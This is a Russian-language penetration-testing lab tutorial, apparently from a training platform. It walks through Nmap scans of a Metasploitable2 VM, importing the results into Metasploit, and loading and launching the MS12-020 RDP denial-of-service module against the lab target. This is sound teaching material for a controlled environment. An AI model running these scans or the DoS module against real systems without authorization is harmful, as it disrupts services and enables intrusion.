Введение
В этом лабораторном занятии вы научитесь использовать Nmap и Metasploit для сканирования сетей и анализа уязвимостей. Nmap (Network Mapper) — это мощный открытый инструмент для обнаружения сетевых ресурсов и проведения аудит безопасности, а Metasploit — широко используемая платформа для пентестинга, которая включает в себя различные эксплойты и полезные нагрузки.
Цель этого лабораторного занятия — дать вам практический опыт в использовании Nmap для выполнения различных типов сканирования, анализа результатов и использования Metasploit для дальнейшего исследования потенциальных уязвимостей на целевой системе.
Настройка окружения
На этом шаге вы настроите лабораторную среду, запустив контейнер Kali Linux и виртуальную машину Metasploitable2.
sudo virsh start Metasploitable2
Подождите, пока целевая машина запустится, это может занять от 1 до 3 минут.
Проверьте, запущена ли виртуальная машина, отправив ей ping:
ping 192.168.122.102
Далее, запустите контейнер Kali Linux и войдите в его среду bash:
docker run -ti --network host b5b709a49cd5 bash
Проверьте виртуальное сетевое соединение в контейнере Kali, используйте Ctrl-C для выхода из ping:
ping 192.168.122.102
Основное использование Nmap
На этом шаге вы научитесь использовать Nmap для выполнения базовых задач сканирования, таких как обнаружение хостов, сканирование портов, определение версий и определение операционной системы.
Выполните комплексное сканирование, запустив следующую команду:
nmap -T4 -A 192.168.122.102
Выполните сканирование для обнаружения хостов, запустив следующую команду:
nmap -T4 -sn 192.168.122.102
Выполните сканирование портов, запустив следующую команду:
nmap -T4 192.168.122.102
Выполните определение операционной системы, запустив следующую команду:
nmap -T4 -O 192.168.122.102
Опция -T4 устанавливает шаблон времени для агрессивного сканирования, а опция -A включает определение операционной системы, сканирование версий, сканирование с использованием скриптов и трассировку маршрута. Опция -sn выполняет простое сканирование для обнаружения хостов, а опция -O пытается определить удаленную операционную систему.
Расширенное использование Nmap
На этом шаге вы познакомитесь с более продвинутыми техниками сканирования с использованием Nmap, такими как сканирование целых подсетей, определенных диапазонов портов и указание сетевого интерфейса.
Сканируйте целую подсеть, запустив следующую команду:
nmap 127.0.0.1/24
Сканируйте определенные порты, запустив следующую команду:
nmap -p80,22,66 127.0.0.1
Выведите список локальных сетевых интерфейсов, запустив следующую команду:
nmap --iflist
Укажите сетевой интерфейс, запустив следующую команду:
nmap -e eth0 127.0.0.1
Эти продвинутые техники позволяют вам настроить сканирование более точно и собрать более детальную информацию о целевой сети или хостах.
Импорт результатов сканирования Nmap в Metasploit
На этом шаге вы научитесь импортировать результаты сканирования Nmap в Metasploit для дальнейшего анализа и эксплойтации.
- Выполните комплексное сканирование и сохраните вывод в XML - файл, запустив следующую команду, и убедитесь, что XML - файл находится в домашней директории
~/. Этот шаг может занять некоторое время:
nmap -sV -Pn -oX ~/shiyanlou.xml 192.168.122.102/24
- Запустите консоль Metasploit:
cd ~
service postgresql start
msfdb init
msfconsole
- Импортируйте XML - файл в Metasploit, запустив следующую команду в консоли Metasploit:
db_import shiyanlou.xml
- Просмотрите импортированные сервисы, запустив следующую команду в консоли Metasploit:
services
- Нажмите Ctrl+D, чтобы выйти из консоли Metasploit, а затем начните проверку
Импортируя результаты сканирования Nmap в Metasploit, вы можете использовать мощные инструменты и модули, доступные в фреймворке Metasploit, для анализа и потенциальной эксплойтации уязвимостей на целевой системе.
Использование модулей в Metasploit
На этом шаге вы научитесь искать и использовать модули в рамках фреймворка Metasploit.
- Во - первых, если вы не находитесь в консоли Metasploit, вам нужно запустить ее:
cd ~
msfconsole
- Теперь вы можете искать модули с помощью команды
searchв консоли Metasploit:
search ms12-020
- Чтобы использовать модуль в консоли Metasploit:
use auxiliary/dos/windows/rdp/ms12_020_maxchannelids
- Показать доступные параметры для модуля в консоли Metasploit:
show options
- Установить обязательные параметры в консоли Metasploit:
set RHOST 192.168.122.102
- Запустить модуль в консоли Metasploit:
exploit
- Нажмите Ctrl+D, чтобы выйти из консоли Metasploit, а затем начните проверку
Metasploit предоставляет широкий спектр модулей для различных целей, таких как эксплойты, полезные нагрузки, вспомогательные модули и многое другое. Изучая и используя подходящий модуль, вы можете попытаться эксплоитировать уязвимости или выполнить другие действия на целевой системе.
Резюме
В этом лабораторном занятии вы научились использовать Nmap для сканирования сетей и сбора информации, а также импортировать результаты сканирования в Metasploit для дальнейшего анализа и эксплойтации. Вы получили практический опыт работы с различными техниками сканирования Nmap, включая обнаружение хостов, сканирование портов, определение версий и определение операционной системы. Кроме того, вы узнали, как искать и использовать модули в рамках фреймворка Metasploit для потенциальной эксплойтации уязвимостей на целевой системе.
В ходе лабораторной работы вы отработали важные навыки для пенетрационного тестирования, такие как настройка контролируемой среды, проведение разведки и анализ потенциальных уязвимостей. Эти навыки являются важными в области кибербезопасности и помогут вам глубже понять концепции сетевой безопасности и техники этического взлома.



